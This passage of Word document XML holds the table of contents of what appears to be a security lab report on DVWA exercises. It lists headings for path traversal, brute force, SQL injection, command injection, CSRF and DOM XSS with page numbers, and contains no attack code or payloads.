                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc115782528 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>44</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="65A2D474" w14:textId="07FBE68D" w:rsidR="00901855" w:rsidRDefault="00901855">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc115782529" w:history="1">
            <w:r w:rsidRPr="00D20450">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5782529 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>45</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="32BD4AEC" w14:textId="0BDDA3C7" w:rsidR="00901855" w:rsidRDefault="00901855">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc115782530" w:history="1">
            <w:r w:rsidRPr="00D20450">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>DVWA (Damn Vulnerable Web Application)</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc115782530 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>45</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="22EFFEFA" w14:textId="6C5E510D" w:rsidR="00901855" w:rsidRDefault="00901855">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc115782531" w:history="1">
            <w:r w:rsidRPr="00D20450">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Path Traversal (2.1)</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc115782531 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>45</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="6C157BFC" w14:textId="0E965144" w:rsidR="00901855" w:rsidRDefault="00901855">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc115782532" w:history="1">
            <w:r w:rsidRPr="00D20450">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Brute Force</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc115782532 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>45</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="0F42511C" w14:textId="745C4C18" w:rsidR="00901855" w:rsidRDefault="00901855">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc115782533" w:history="1">
            <w:r w:rsidRPr="00D20450">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Brute Force – Low level</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc115782533 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>47</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="7E2E5BA3" w14:textId="276296B8" w:rsidR="00901855" w:rsidRDefault="00901855">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc115782534" w:history="1">
            <w:r w:rsidRPr="00D20450">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>SQL injection (3.1)</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc115782534 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>49</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="537E6C75" w14:textId="40EA064C" w:rsidR="00901855" w:rsidRDefault="00901855">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc115782535" w:history="1">
            <w:r w:rsidRPr="00D20450">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>SQLi – Low level</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc115782535 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>50</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="3413A23E" w14:textId="79FA3518" w:rsidR="00901855" w:rsidRDefault="00901855">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc115782536" w:history="1">
            <w:r w:rsidRPr="00D20450">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>SQLi – Medium level</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc115782536 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>51</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="7043E0EA" w14:textId="2C60844B" w:rsidR="00901855" w:rsidRDefault="00901855">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc115782537" w:history="1">
            <w:r w:rsidRPr="00D20450">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>SQLi – Online Challenges</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc115782537 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>51</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="77185A47" w14:textId="358430EE" w:rsidR="00901855" w:rsidRDefault="00901855">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc115782538" w:history="1">
            <w:r w:rsidRPr="00D20450">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Command Injection (2.1)</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc115782538 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>55</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="7C4C5DEF" w14:textId="4BF505AC" w:rsidR="00901855" w:rsidRDefault="00901855">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc115782539" w:history="1">
            <w:r w:rsidRPr="00D20450">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Command Injection – Low level</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc115782539 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>55</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="18BC9BAD" w14:textId="450EBFA9" w:rsidR="00901855" w:rsidRDefault="00901855">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc115782540" w:history="1">
            <w:r w:rsidRPr="00D20450">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Command Injection – Medium level</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc115782540 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>57</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="16AD0D73" w14:textId="39DD638D" w:rsidR="00901855" w:rsidRDefault="00901855">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc115782541" w:history="1">
            <w:r w:rsidRPr="00D20450">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>CSRF (4.1)</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc115782541 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>59</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="07E9A0D7" w14:textId="0E0FAF7A" w:rsidR="00901855" w:rsidRDefault="00901855">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc115782542" w:history="1">
            <w:r w:rsidRPr="00D20450">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>CSRF – Low Level</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc115782542 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>59</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="28CC0417" w14:textId="4BF9B5F0" w:rsidR="00901855" w:rsidRDefault="00901855">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc115782543" w:history="1">
            <w:r w:rsidRPr="00D20450">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>XSS DOM (4.1)</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc115782543 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>60</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="35C5B1BC" w14:textId="1A87132F" w:rsidR="00901855" w:rsidRDefault="00901855">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc115782544" w:history="1">
            <w:r w:rsidRPr="00D20450">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>XSS DOM – Low Level</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc115782544 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>60</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="7C4048CB" w14:textId="496266BB" w:rsidR="00901855" w:rsidRDefault="00901855">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc115782545" w:history="1">
            <w:r w:rsidRPr="00D20450">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>XSS DOM – Medium Level</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc115782545 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
